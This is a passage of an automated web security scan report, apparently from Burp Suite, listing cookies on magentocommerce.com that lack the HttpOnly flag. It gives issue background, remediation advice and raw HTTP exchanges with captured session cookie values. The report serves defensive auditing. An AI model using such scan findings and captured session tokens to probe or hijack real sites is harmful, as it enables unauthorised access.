X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fwiki%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Location: http://www.magentocommerce.com/wiki/
Content-Length: 0

4. Cookie without HttpOnly flag set  previous  next
There are 170 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

4.1. http://www.magentocommerce.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:40:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: guid=db13949594b1b3d2138f3212e370aacf; expires=Mon, 06-Aug-2012 13:40:32 GMT; path=/
Set-Cookie: exp_domain=magentocommerce.com; expires=Sat, 11-Aug-2012 23:48:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=997810832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313170832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:40:32 GMT
Content-Length: 35354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.2. http://www.magentocommerce.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sat, 11-Aug-2012 23:49:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313170873; expires=Sat, 11-Aug-2012 13:41:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:13 GMT
Content-Length: 35376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.3. http://www.magentocommerce.com/media/screencasts/configurable-products/view  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/configurable-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176088; expires=Sat, 11-Aug-2012 15:08:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:08 GMT
Content-Length: 35258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.4. http://www.magentocommerce.com/media/screencasts/search/view  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/search/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176092; expires=Sat, 11-Aug-2012 15:08:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:13 GMT
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.5. http://www.magentocommerce.com/!!!--  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /!!!--

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /!!!-- HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176591; expires=Sat, 11-Aug-2012 15:16:31 GMT; path=/; domain=magentocommerce.com
Content-Length: 32486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.6. http://www.magentocommerce.com/answers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /answers/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176378; expires=Sat, 11-Aug-2012 15:12:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fanswers%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:12:58 GMT
Content-Length: 54246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...
4.7. http://www.magentocommerce.com/blog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176376; expires=Sat, 11-Aug-2012 15:12:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:57 GMT
Content-Length: 92426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.8. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/ebay-agrees-to-acquire-magento/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/ebay-agrees-to-acquire-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176433; expires=Sat, 11-Aug-2012 15:13:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:53 GMT
Content-Length: 45747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.9. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-new-open-source-project/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/magento-wins-best-new-open-source-project/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176465; expires=Sat, 11-Aug-2012 15:14:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-new-open-source-project%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:26 GMT
Content-Length: 80846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.10. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/magento-wins-best-of-open-source-enterprise-applications/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176441; expires=Sat, 11-Aug-2012 15:14:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A72%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-of-open-source-enterprise-applications%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.11. http://www.magentocommerce.com/boards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176405; expires=Sat, 11-Aug-2012 15:13:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fboards%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:27 GMT
Content-Length: 293542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
